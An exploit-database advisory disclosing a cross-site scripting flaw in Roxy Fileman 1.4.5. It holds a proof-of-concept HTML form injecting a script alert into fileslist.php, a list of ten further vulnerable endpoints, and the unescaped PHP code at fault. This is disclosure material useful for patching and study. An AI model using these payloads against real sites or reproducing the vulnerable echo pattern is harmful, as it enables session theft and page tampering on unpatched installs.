Roxy Fileman Cross Site Scripting

Published
Credit
Risk
2017.01.13
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

*=============================================================|
| Exploit Title: Roxy Fileman Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.roxyfileman.com/
|
| Download Link : http://www.roxyfileman.com/download.php?f=1.4.5-php
|
| Version : V 1.4.5
|
| Platform : PHP
|
| Tested on: Kali Linux
|
| Date: 1 /12 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD>
| <TITLE>Roxy Fileman Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://Target/[PATH]/fileman/php/fileslist.php" method="post">
| <input type="hidden" id="d" value="=%252F2%252Ffileman%252FUploads'%22()%26%25"><script>alert('M.R.S.L.Y')</script>/>
|</form>
|</BODY>
|</HTML>
|
*=======================|
| vulnerability Method : GET & POST
| Files that have this vulnerability :
|
| http://Target/[PATH]/fileman/php/copydir.php
| http://Target/[PATH]/fileman/php/copyfile.php
| http://Target/[PATH]/fileman/php/createdir.php
| http://Target/[PATH]/fileman/php/deletedir.php
| http://Target/[PATH]/fileman/php/renamedir.php
| http://Target/[PATH]/fileman/php/thumb.php
| http://Target/[PATH]/fileman/php/movefile.php
| http://Target/[PATH]/fileman/php/downloaddir.php
| http://Target/[PATH]/fileman/php/dirtree.php
| http://Target/[PATH]/fileman/php/movedir.php
*=======================|
|How to fix this vulnerability :
|
|You should first try to f.ilter all input variables ، After use command echo in script :)
|
*=======================|
|Vulnerable code For Example:
|
|include '../system.inc.php';
|include 'functions.inc.php';
|
|verifyAction('FILESLIST');
|checkAccess('FILESLIST');
|
|$path = (empty($_POST['d'])? getFilesPath(): $_POST['d']);
|$type = (empty($_POST['type'])?'':strtolower($_POST['type']));
|if($type != 'image' && $type != 'flash')
| $type = '';
|verifyPath($path);
|
|$files = listDirectory(fixPath($path), 0);
|natcasesort($files);
|$str = '';
|echo '[';
|foreach ($files as $f){
| $fullPath = $path.'/'.$f;
| if(!is_file(fixPath($fullPath)) || ($type == 'image' && !RoxyFile::IsImage($f)) || ($type == 'flash' && !RoxyFile::IsFlash($f)))
| continue;
| $size = filesize(fixPath($fullPath));
| $time = filemtime(fixPath($fullPath));
| $w = 0;
| $h = 0;
| if(RoxyFile::IsImage($f)){
| $tmp = @getimagesize(fixPath($fullPath));
| if($tmp){
| $w = $tmp[0];
| $h = $tmp[1];
| }
| }
| $str .= '{"p":"'.mb_ereg_replace('"', '\"', $fullPath).'","s":"'.$size.'","t":"'.$time.'","w":"'.$w.'","h":"'.$h.'"},';
|}
|$str = mb_substr($str, 0, -1);
|echo $str;
|echo ']';
|?>
*=============================================================|
| Special Thanks To : Ehsan Cod3r ، micle ، Und3rgr0und ، Amir.ght ،
| xenotix، modiret، V For Vendetta ، Alireza ، r4ouf ، Spoofer ،
| And All Of My Friends ، The Last One : My Self, M.R.S.L.Y
*=============================================================|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com